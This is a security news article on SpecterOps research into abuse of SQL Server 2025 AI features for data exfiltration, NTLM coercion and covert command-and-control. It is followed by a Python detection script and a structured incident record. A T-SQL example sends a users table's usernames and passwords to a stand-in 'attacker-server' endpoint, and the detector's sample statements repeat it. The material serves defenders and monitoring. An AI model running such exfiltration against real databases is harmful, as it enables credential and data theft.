Microsoft SQL Server 2025’s AI Features Expose New Data Exfiltration Risks
A recent security analysis by researcher Justin Kalnasy of SpecterOps reveals that Microsoft SQL Server 2025’s native AI capabilities can be weaponized by attackers to exfiltrate sensitive data and establish covert command-and-control (C2) channels directly within the database engine. The newly introduced AI-focused features, designed to support workflows like Retrieval-Augmented Generation (RAG), include stored procedures and functions such as sp_invoke_external_rest_endpoint, CREATE EXTERNAL MODEL, and AI_GENERATE_EMBEDDINGS, all of which enable SQL Server to communicate with external services over HTTPS.
The most critical vulnerability lies in sp_invoke_external_rest_endpoint, which allows database instances to send arbitrary HTTP requests to external endpoints with payloads up to 100MB. While intended for legitimate API integrations, this functionality provides attackers with a built-in data exfiltration channel. Once an adversary gains high-privileged access (e.g., sysadmin), they can extract entire tables or files and transmit them to attacker-controlled infrastructure without relying on traditional tools like PowerShell or xp_cmdshell, which are more likely to trigger security alerts.
Attackers can serialize sensitive data into JSON format and exfiltrate it in bulk via HTTPS, avoiding bandwidth constraints typical of C2 frameworks. For example:
DECLARE @payload NVARCHAR(MAX);
SELECT @payload = (SELECT username, password FROM dbo.app_users FOR JSON AUTO);
EXEC sp_invoke_external_rest_endpoint @url = N'https://attacker-server/collect', @method = 'POST', @payload = @payload;
Additionally, combining the REST endpoint feature with OPENROWSET enables file-level exfiltration, allowing attackers to read and transmit sensitive system files.
Beyond direct data theft, SQL Server 2025 can be repurposed as a persistent exfiltration platform. By leveraging database triggers, attackers can automatically send newly inserted or updated records to remote servers in real time, enabling continuous credential harvesting or data leakage without manual intervention.
The CREATE EXTERNAL MODEL feature introduces further risks by allowing attackers to coerce NTLM authentication over SMB. By specifying a malicious UNC path as the model location, SQL Server can be forced to authenticate against attacker-controlled infrastructure, facilitating credential capture or relay attacks.
More sophisticated techniques involve abusing AI features to establish covert C2 channels. By registering an external model pointing to an attacker-controlled API and using AI_GENERATE_EMBEDDINGS as a communication mechanism, adversaries can issue commands and receive responses disguised as legitimate AI traffic. This blending of malicious activity with normal AI workflows complicates detection, particularly in environments where outbound HTTPS traffic from database servers is now considered routine.
The integration of AI capabilities into SQL Server 2025 marks a shift in enterprise database security, as historically suspicious outbound traffic is now normalized. Traditional detection strategies may prove less effective, requiring defenders to reassess security baselines, monitor high-risk feature usage, and restrict outbound network access from database servers. The findings highlight a broader trend: as AI becomes embedded in core enterprise software, it introduces new avenues for exploitation if not properly secured.
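One way to act on the monitoring advice above, added here as an example and not taken from the SpecterOps research or the article: a reviewer for audited T-SQL statement text that flags the feature uses this page describes. The allowlisted host, the finding labels and the sample statements are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this instance is approved to call (constructed value).
ALLOWED_HOSTS = {"approved-ai.example"}

PROC = re.compile(r"\bsp_invoke_external_rest_endpoint\b", re.I)
REST_URL = re.compile(r"\bsp_invoke_external_rest_endpoint\b.*?@url\s*=\s*N?'([^']*)'", re.I | re.S)
MODEL_LOC = re.compile(r"\bCREATE\s+EXTERNAL\s+MODEL\b.*?\bLOCATION\s*=\s*N?'([^']*)'", re.I | re.S)
TRIGGER = re.compile(r"\b(?:CREATE|ALTER)\s+(?:OR\s+ALTER\s+)?TRIGGER\b", re.I)
OPENROWSET = re.compile(r"\bOPENROWSET\b", re.I)

def _host(url):
    """Lower-cased host part of a URL, or an empty string if there is none."""
    return (urlsplit(url).hostname or "").lower()

def review_statement(sql, allowed=ALLOWED_HOSTS):
    """Return sorted finding labels for one audited T-SQL statement or batch."""
    findings = set()
    if PROC.search(sql):
        urls = REST_URL.findall(sql)
        if not urls:
            findings.add("rest-call-url-not-literal")  # URL in a variable: review by hand
        if any(_host(u) not in allowed for u in urls):
            findings.add("rest-call-unapproved-host")
        if TRIGGER.search(sql):
            findings.add("rest-call-inside-trigger")
        if OPENROWSET.search(sql):
            findings.add("rest-call-with-openrowset")
    for loc in MODEL_LOC.findall(sql):
        if loc.startswith(("\\\\", "//")):  # UNC path instead of an HTTPS endpoint
            findings.add("external-model-unc-location")
        elif _host(loc) not in allowed:
            findings.add("external-model-unapproved-host")
    return sorted(findings)

# Constructed audit records (statement text only, trimmed for the example).
SAMPLES = [
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://approved-ai.example/v1/embeddings', @method = 'POST', @payload = @p;",
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://attacker-server/collect', @method = 'POST', @payload = @payload;",
    "CREATE TRIGGER trg_demo ON dbo.app_users AFTER INSERT AS EXEC sp_invoke_external_rest_endpoint @url = @u, @payload = @p;",
    r"CREATE EXTERNAL MODEL DemoModel WITH (LOCATION = '\\files.example\share\model')",
]

def scan(samples=SAMPLES):
    """Map the index of each flagged statement to its findings."""
    return {i: f for i, s in enumerate(samples) if (f := review_statement(s))}

if __name__ == "__main__":
    for idx, found in scan().items():
        print(idx, found)
```

Pattern matching on statement text misses dynamically built SQL, so this works as a triage aid alongside an outbound allowlist enforced at the network layer, not in place of one.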
Source: https://gbhackers.com/hackers-could-abuse-sql-server-2025/
Microsoft TPRM report: https://www.rankiteo.com/company/microsoft-security
"id": "mic1781785861",
"linkid": "microsoft-security",
"type": "Vulnerability",
"date": "6/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'customers_affected': 'Organizations using Microsoft '
'SQL Server 2025 with AI '
'features enabled',
'industry': 'Technology/Enterprise Software',
'location': 'Global',
'name': 'Microsoft SQL Server 2025',
'type': 'Database Software'}],
'attack_vector': 'Abuse of legitimate AI features in SQL Server 2025',
'data_breach': {'data_exfiltration': 'Yes (via HTTPS to attacker-controlled '
'infrastructure)',
'personally_identifiable_information': 'Potential (if stored '
'in compromised '
'tables)',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Personally Identifiable '
'Information (PII)',
'Credentials (usernames, '
'passwords)',
'System files']},
'description': 'A recent security analysis by researcher Justin Kalnasy of '
'SpecterOps reveals that Microsoft SQL Server 2025’s native AI '
'capabilities can be weaponized by attackers to exfiltrate '
'sensitive data and establish covert command-and-control (C2) '
'channels directly within the database engine. The newly '
'introduced AI-focused features include stored procedures and '
'functions such as sp_invoke_external_rest_endpoint, CREATE '
'EXTERNAL MODEL, and AI_GENERATE_EMBEDDINGS, which enable SQL '
'Server to communicate with external services over HTTPS. '
'Attackers can exploit these features to exfiltrate data, '
'establish persistence, and evade detection.',
'impact': {'brand_reputation_impact': 'Potential erosion of trust in '
'Microsoft SQL Server 2025 security',
'data_compromised': 'Sensitive data (e.g., usernames, passwords, '
'system files)',
'identity_theft_risk': 'High (if PII is exfiltrated)',
'operational_impact': 'Potential unauthorized data access and '
'exfiltration',
'payment_information_risk': 'High (if payment data is exfiltrated)',
'systems_affected': 'Microsoft SQL Server 2025 instances with AI '
'features enabled'},
'lessons_learned': 'The integration of AI capabilities into core enterprise '
'software introduces new attack surfaces. Traditional '
'detection strategies may be less effective, requiring '
'defenders to reassess security baselines and monitor '
'high-risk feature usage.',
'post_incident_analysis': {'corrective_actions': ['Disable or restrict '
'high-risk features if not '
'required',
'Implement strict outbound '
'traffic policies for '
'database servers',
'Enhance monitoring for '
'anomalous AI feature '
'usage'],
'root_causes': 'Abuse of legitimate AI features in '
'SQL Server 2025 for malicious '
'purposes (e.g., data exfiltration, '
'C2 channels)'},
'recommendations': ['Restrict outbound network access from database servers',
'Monitor usage of high-risk features (e.g., '
'sp_invoke_external_rest_endpoint, CREATE EXTERNAL MODEL)',
'Review and update security baselines for SQL Server 2025',
'Implement network segmentation to limit database server '
'communications',
'Educate security teams on new AI-related attack vectors'],
'references': [{'source': 'SpecterOps Research (Justin Kalnasy)'}],
'response': {'enhanced_monitoring': 'Recommended to monitor high-risk feature '
'usage (e.g., '
'sp_invoke_external_rest_endpoint)',
'network_segmentation': 'Recommended to restrict outbound '
'network access from database servers'},
'title': 'Microsoft SQL Server 2025’s AI Features Expose New Data '
'Exfiltration Risks',
'type': 'Data Exfiltration',
'vulnerability_exploited': ['sp_invoke_external_rest_endpoint (arbitrary HTTP '
'requests)',
'CREATE EXTERNAL MODEL (NTLM coercion)',
'AI_GENERATE_EMBEDDINGS (covert C2 channels)',
'OPENROWSET (file-level exfiltration)']}